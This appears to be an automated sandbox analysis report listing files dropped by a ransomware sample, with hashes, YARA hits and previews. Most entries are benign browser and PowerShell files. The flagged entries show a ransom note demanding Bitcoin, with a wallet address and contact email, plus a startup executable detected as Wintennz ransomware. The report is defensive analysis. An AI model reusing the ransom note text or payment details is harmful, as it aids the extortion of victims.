SSDEEP:	12:TMHdNMNxvLDnWimI002EtM3MHdNMNxvLvIbnWimI00OYGmZEtMb:2d6NxvfSZHKd6NxvMSZ7Yjb
MD5:	E93ED7FFF4759C4A8CF641CF87C257F6
SHA1:	E0704CF2CB70EDE3004234627DF2B10372104C18
SHA-256:	EE913B733B382792E139068FAE30C42DFB4727FAF687AD9884F294689D1657C7
SHA-512:	1A219A0020AA4153ADDEC2EF45FB069D79B6B3782651314533B1DA6C9875852DECF6969FDE4A83C54A3228F8AD0B0FF4FDA0DE995F898D97356F33EF377E4C4E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x7845bfb5,0x01d72ec1</date><accdate>0x7845bfb5,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x7845bfb5,0x01d72ec1</date><accdate>0x7848220c,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.098108586753972
Encrypted:	false
SSDEEP:	12:TMHdNMNxiTnWimI002EtM3MHdNMNxiTnWimI00OYGd5EtMb:2d6NxkSZHKd6NxkSZ7YEjb
MD5:	E312803D3538BC4F88CC0926AD8D69E7
SHA1:	39F2FEB8B76F9AFB77266FC19D7DE5DA9088FBF9
SHA-256:	E02A857DDA6E079E9139363D8E2A208AFC898C0413F98CBB3781BEFADFBA33AB
SHA-512:	E47332FEEB9C0BB6B441B86F3C23D2A24471E5EF06769EBE790C395D048CF3E97580FBFBD37062E684D0B422C798297D4A88720ED12F9F543071D1E29F88E89A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x78435d5e,0x01d72ec1</date><accdate>0x78435d5e,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x78435d5e,0x01d72ec1</date><accdate>0x78435d5e,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.109323675070201
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwlIlIbnWimI002EtM3MHdNMNxhGwlIlIbnWimI00OYG8K075EtMb:2d6NxQISZHKd6NxQISZ7YrKajb
MD5:	965B48CBADFBF8659174F668B901FB0A
SHA1:	17E14F3292C86379D2CCEA0508EC0D294A89C817
SHA-256:	1A8F3B0AEA502910EEB3777D307675DE6C6B61E4F0DA20073A46491CE934320D
SHA-512:	25F27B29ADB880B411CE4D5CFA0F0522A3C4D28DC0361D77FC360C9C36FF4BD1B9D9611CF0941C72D6AD8D3F173C0BBA4346CAA4E5068F7816579AE433B28E0B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7848220c,0x01d72ec1</date><accdate>0x7848220c,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7848220c,0x01d72ec1</date><accdate>0x7848220c,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.104548611350903
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nDnWimI002EtM3MHdNMNx0nDnWimI00OYGxEtMb:2d6Nx0DSZHKd6Nx0DSZ7Ygb
MD5:	171E76BEE48441F840CF776D8E2D30DC
SHA1:	13079D417A94DAFDCCAA13D2CEE8DD4D82C11B78
SHA-256:	E1EAF0B779763B227721E44091D1943766F80940291F886074EF0858D278187C
SHA-512:	60191F2B04E4508A2157EBE6A39A31F1E9E5BB1285A4059110BE7E6D44DC6469E0F2E92EB16AF49E15CC8BDDEDA0A4E0BCF7628850FA971BB94D3733BD62FE92
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x7845bfb5,0x01d72ec1</date><accdate>0x7845bfb5,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x7845bfb5,0x01d72ec1</date><accdate>0x7845bfb5,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.129745130774682
Encrypted:	false
SSDEEP:	12:TMHdNMNxxTnWimI002EtM3MHdNMNxxXnWimI00OYG6Kq5EtMb:2d6NxFSZHKd6NxZSZ7Yhb
MD5:	85A7D513C8B9E83CFA6E340741D133B5
SHA1:	58F8A61B0A6FAB0BAF0A1E640910DB47BB8219C7
SHA-256:	0A9B43B555FBB47CA801BE5BB618C8257026AD9D5E01BE2B74A42BF497DC86AB
SHA-512:	2D3124B0548F8655E8528B517398F53F30C79B95E596BE5184F53B3E04DB13D107D317613F5D9B5F0F91EFEF2EBE44BE801121AE544C854973E94DACA6A4C637
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x78435d5e,0x01d72ec1</date><accdate>0x78435d5e,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x78435d5e,0x01d72ec1</date><accdate>0x7845bfb5,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.104816695808355
Encrypted:	false
SSDEEP:	12:TMHdNMNxctfhnWimI002EtM3MHdNMNxctPnWimI00OYGVEtMb:2d6NxySZHKd6NxgSZ7Ykb
MD5:	B79537346D381EA38AAF34C2385A1345
SHA1:	09D9C26A8775075C8C662F3BF3C6191945BA2395
SHA-256:	612F65E967CA625910E83CD4C55F838444C41FB156064677C19AA5F24BF5EDA1
SHA-512:	56EBD25E99AD14C14884F0EBB9C43AF432AAC11648EAFBF1597F6BCF3EA873313F2E1575825AB25004A6F3D078820BEF970FF36507070D49D594011535CA7C56
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7840faf9,0x01d72ec1</date><accdate>0x7840faf9,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7840faf9,0x01d72ec1</date><accdate>0x78435d5e,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.083555479587859
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnTnWimI002EtM3MHdNMNxfnTnWimI00OYGe5EtMb:2d6NxbSZHKd6NxbSZ7YLjb
MD5:	52D1A7EB3DD21DF4E75E9842AC18CC32
SHA1:	FA9C8DA1E98BEF4B0C6F96C1C3921E904D6900EF
SHA-256:	386A4F8AA7ED58D89669DD85DD906B6F58CEE3E819F8A9C117BFFC9F768E2E84
SHA-512:	A6BD054F9C9B4C4BEA84DD9D5A60A5998B2C07CAA8124358DB64BBF0F4FC4F176B74B7DB54B7A53F981CA3BA0E164D9D95D2391E31798B25738830DD095C4545
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x78435d5e,0x01d72ec1</date><accdate>0x78435d5e,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x78435d5e,0x01d72ec1</date><accdate>0x78435d5e,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Windows_logo_-_2012[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 1121 x 1229, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	155935
Entropy (8bit):	7.948181077959862
Encrypted:	false
SSDEEP:	3072:3/XcJILn+l59lntTbzZ1Xppi2TSAQ4cuvbBX0jUvfgp:vsiL+/919e2ObuTFvop
MD5:	7A1A17A918D1761E671BE0CAF37C36FA
SHA1:	CC238D241ED0191B14EFC885B060F57B31E44368
SHA-256:	B95360194A3435937E9949AF333CA4D072A7871EB8BAA4F861619275E073DD3E
SHA-512:	415F231764DD0179814A7EEC7EFAF2169A0FFF1D831533298403DD192DC4233071E15B8119384134CE8A8E39A1F857B51C7041EB9FA3A8A315DA0E3AEB491690
Malicious:	false
IE Cache URL:	https://upload.wikimedia.org/wikipedia/commons/c/c7/Windows_logo_-_2012.png
Preview:	.PNG........IHDR...a.........c,......tRNS......7X.}....pHYs..........o.d....IDATx..w..u....xF....".4.h.S..q....qK.)..'NY'q..7.ws...}7.q.=]"..;HJ.Q'%..7.D}...W.. .....x?......8'..s....... .. .. H.......A..A..A...A..A..A...A..A..A........\|....Y..#!.. .. .....0.......t.>.~...,...L.Os...1t$.A..A..A...W.../..<.5...~...].......B.Hh.H.s.w......A..A...$n..........k+/\.{.z....]s.;.;V..}.<......#....".^....1........A..A..)kn...`....../.G?j..U..1.#..}C........kH....K.~Q...s.Hu^..a.y..s/..4v...A..A..A.2b...1"....f..vu.c....O....N;.O9WO8}G.......wH.;.{.a....A..t\..KB..P.p`8B......p....et$.A..A..Ad.8...~?..M.7..\|.1.A..3.....#....Eb8m#.N.g....{.z..g8Bk.............#.......{`.{.{....o.#!.. .. ."+....h.~..o...z.K;E..O.g.t.q,.t..r-.w.....#B.%h....S;.....=.!.5.Y....a.....n......3....{=.;L.K.]./.oc..A..A..A.Yx....._]..id.....[&..9..2s........v..{...O.k8...t^.v...G=oqA.vD.iD. ._.._..K=D.<..I}..2.,yY...q.!..&..{.~..:.. .. .. .7.....Z.?....k.O.y.5O=n.~.c.1...3p

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1108
Entropy (8bit):	5.263132728434415
Encrypted:	false
SSDEEP:	24:3YmPpQrLAo4KAxCoOu426N15qRPX9t4CvKaBPnKEroYC:omPerB4BOu/65qRP9t4CvpBfzC
MD5:	FAF99B92D8A7EDCEC9921B534E8C3242
SHA1:	D1D7311EF27BE714B770DD562C82B5A0C3503159
SHA-256:	3ED1C9CCC6CBDAA2A36D5BDA7DAFBD18ED6619DC2CDF739C538478473971322A
SHA-512:	53F6A1CFB5A3D6EFDA664B3BA571A92E4F45DC32EEA94FAA444AE950C9E1255FA400369C0361402FA8C4E5D822BFA245F5E231A542DF924DBC44FA4DCE07A189
Malicious:	false
Preview:	@...e...................................".......................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesH................. ....H..m)aUu.........Microsoft.PowerShell.Security...L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0d5rwgtv.gyf.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1awlznq2.vzl.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3dkgjlm.nde.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0ydevkq.nal.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5usy55r.xcl.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qqsxhili.zad.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzdnsnki.1yn.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugh2xyv1.ruk.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vyale023.ea2.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yankvih3.t0y.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DF5074BDAEB96E450C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25441
Entropy (8bit):	0.27918767598683664
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laA:kBqoxxJhHWSVSEab
MD5:	AB889A32AB9ACD33E816C2422337C69A
SHA1:	1190C6B34DED2D295827C2A88310D10A8B90B59B
SHA-256:	4D6EC54B8D244E63B0F04FBE2B97402A3DF722560AD12F218665BA440F4CEFDA
SHA-512:	BD250855747BB4CEC61814D0E44F810156D390E3E9F120A12935EFDF80ACA33C4777AD66257CCA4E4003FEF0741692894980B9298F01C4CDD2D8A9C7BB522FB6
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF7416FE817A2E2AD8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	35353
Entropy (8bit):	0.6280069563260582
Encrypted:	false
SSDEEP:	192:kBqoxK/UDUgUTU3U8URUzUGAUtAUiThTPN:kBqoxK/ORKixIi4bXTl1
MD5:	7939D709EAD23E2834D17223100C51DB
SHA1:	467B11A61D6C77695EB03824DC896A9EBC28DB3E
SHA-256:	374C9FD4F09F4C8773C015F0AF3CF11912421F6D75BA7A40690092D578A1B6D0
SHA-512:	AECA473654976C5EEB9ABF1677A83289006491EB03376192D6442E57CD3D21CB7784E91B18E18A571E7DF9B73B3C29A8F1388C6B3C24A64F325FB9AA83684C2A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD8A40B72B5B4C801.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13125
Entropy (8bit):	0.5292948632059057
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loj9loj9lWb3AE2u:kBqoIE6b3AE2u
MD5:	DFF746BD8C81C6CDB108E30CE43D3D66
SHA1:	1DA24FDF4A0BDA69C0BE0EA89AE36BF7E6F4343B
SHA-256:	49851AD5582BB724C24A11A1DCD9A012672CB29117D7B29E25B8FFF4BBB4889C
SHA-512:	3A43A3EBBD18A389BF9CB813228AB2A1B87D172752DA9DF1AB38F2DD063D222482354743DDE785AADFFC7628B3E97F1A27AC3CF05348E71DC70DF39E1351F047
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTOPEN_ote.html Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	1073
Entropy (8bit):	4.828753393289481
Encrypted:	false
SSDEEP:	24:hUwAYObH2jRqlXGU6ZNCG9CN2BcDzKASFOvxNH3eMQf963k8Eb:erbrlXw42eRc
MD5:	AD27DDC49AE27840CF4EEDF30AC1B8ED
SHA1:	00D3DA31ACE6F8484FAAB65587551B4B72662EC4
SHA-256:	18895A31A02B8F84D637011B0B506994706043684B81C814DC76C639F7CC6DC6
SHA-512:	98CABCEB778485EB2077DF09677EAD70856AAF062FAB7C676481C820A46148211FF5D36DF0EBDB35C4CDF8A0E9BB85F21C445C9CF71C3D69CA8EBEB1631D2037
Malicious:	true
Preview:	<!DOCTYPE html>. <html>. <head>. <title>Error!</title>. </head>. <body style="background-color:#0078d7">. <h1 style="color:white">Warning!</h1>. <img src="https://2no.co/2DetN5" width="100">. <p style="color:white">Your files have been encrypted!<br />. Please follow the instructions below to restore them. Failing to follow the instructions may result in permanent data corruption.<br />. 1. Purchase $200 in Bitcoin (BTC). Visit <a style="background-color: #FFFFFF" href="https://bitcoin.org/en/buy" target="_blank">https://bitcoin.org/en/buy</a> to learn how to do this.<br />. 2. Send the new Bitcoin to the following address: 1M48oia3zbzuwqCWsWSA242EanbxH191CB<br />. 3. Contact our support team at winhelp@cryptolab.nl and explain your issue.<br />. 4. After we have confirmed your Bitcoin payment, our support team will send you a decryption password.<br />. 5. Use the password with our program to decrypt your fi

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	941568
Entropy (8bit):	6.475137463880299
Encrypted:	false
SSDEEP:	12288:6Bqk8tIzpnRc3hg098BDtcQxFVx2DyxLbWURXwNi5DHkJ9TbJtJ:6BHr8D90DtBFVxYILbbRXwNz/Tbl
MD5:	2716659C3B1E8927DCB2E418E99B1EA5
SHA1:	0428A2EAD08F005F3C90A493E10207322D8A429B
SHA-256:	1BA9EF8703B10A0F158636A138B120835E9588C21EC2E78BE898AFCAE54B0142
SHA-512:	DB25A1D046F6E83B3D7BA1D6205B04DE6F74581837F0D293F6F9983975C8BAD2B8CC53E956454AB8528F3350BBA3ABE04032C3B6B1C1A0C0C844D40F9B957B64
Malicious:	true
Yara Hits:	Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe, Author: Florian Roth Rule: JoeSecurity_Wintennz, Description: Yara detected Wintennz Ransomware, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe, Author: Joe Security
Antivirus:	Antivirus: Metadefender, Detection: 27%, Browse Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f..."..".."..+.b.6..... ..[6.%....5.....(....&..y...3.."...3.....m....&..".......#..Rich"..................PE..d.....^`.........."..........V......(..........@..........................................`.....................................................T................w..............H...P...T.......................(.......8............ ..`............................text...\........................... ..`.rdata....... ......................@..@.data...X...........................@....pdata...w.......x..................@..@.reloc..H............R..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\BQJUWOYRTO.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.812466537563609
Encrypted:	false
SSDEEP:	24:tOfYyavNkGB88uRgfgiK1Dy6O3txp5hwNyAHjM++D:tQNavrbgiMy6O9xp8yE+D
MD5:	200840B98ECDECCC2781CED7A0A2F25A
